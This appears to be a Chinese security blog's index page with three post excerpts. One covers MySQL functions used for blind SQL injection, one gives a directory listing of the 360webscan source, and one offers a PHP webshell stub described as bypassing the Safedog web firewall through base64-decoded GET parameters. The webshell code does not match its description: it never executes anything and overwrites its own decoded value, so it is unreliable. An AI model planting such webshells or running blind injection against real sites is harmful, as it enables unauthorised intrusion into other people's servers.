mysql 盲注笔记

| 热度 | 字数统计: 481 字 | 阅读时长: 3 分

盲注分为布尔盲注和时间盲注

函数

盲注需要用到的函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
left(a,b) 从左侧截取a的前b位
left(12345,2) --> 12

length(a) 获取a的长度
length(12345) --> 5

substr(a,b,c)、mid(a,b,c) 从b开始 截取a的c位
substr(12345,1,2) --> 12

ascii(a)、ord(a) 转a为ascii码
ascii(1) --> 49

if(a,b,c) 如果a成立 执行b 否则执行c
if(1>0,1,0) --> 1

sleep(a) 运行a秒

benchmark(a,b) 执行b a次

Read More

360webscan 源码

| 热度 | 字数统计: 50 字 | 阅读时长: 1 分

目录结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
360webscan
│ index.php
│ webscan360.class.php
│ webscan360_admin.php
│ webscan360_config.php

├─360safe
360scan.php
360webscan.php
│ index.php
│ webscan_cache.php

└─lib
index.php
webscan360_db.class.php
webscan360_http.class.php

webscan360.zip

php bypass safedog

| 热度 | 字数统计: 43 字 | 阅读时长: 1 分

原理

通过 GET 获取 a 和 b 并进行 base64 解码, 最后拼接执行.

1
2
3
4
5
6
<?php
$a = $_GET['a'];
$b = $_GET['b'];
$c = base64_decode($a).base64_decode($b);
$c = $_REQUEST['cmd'];
?>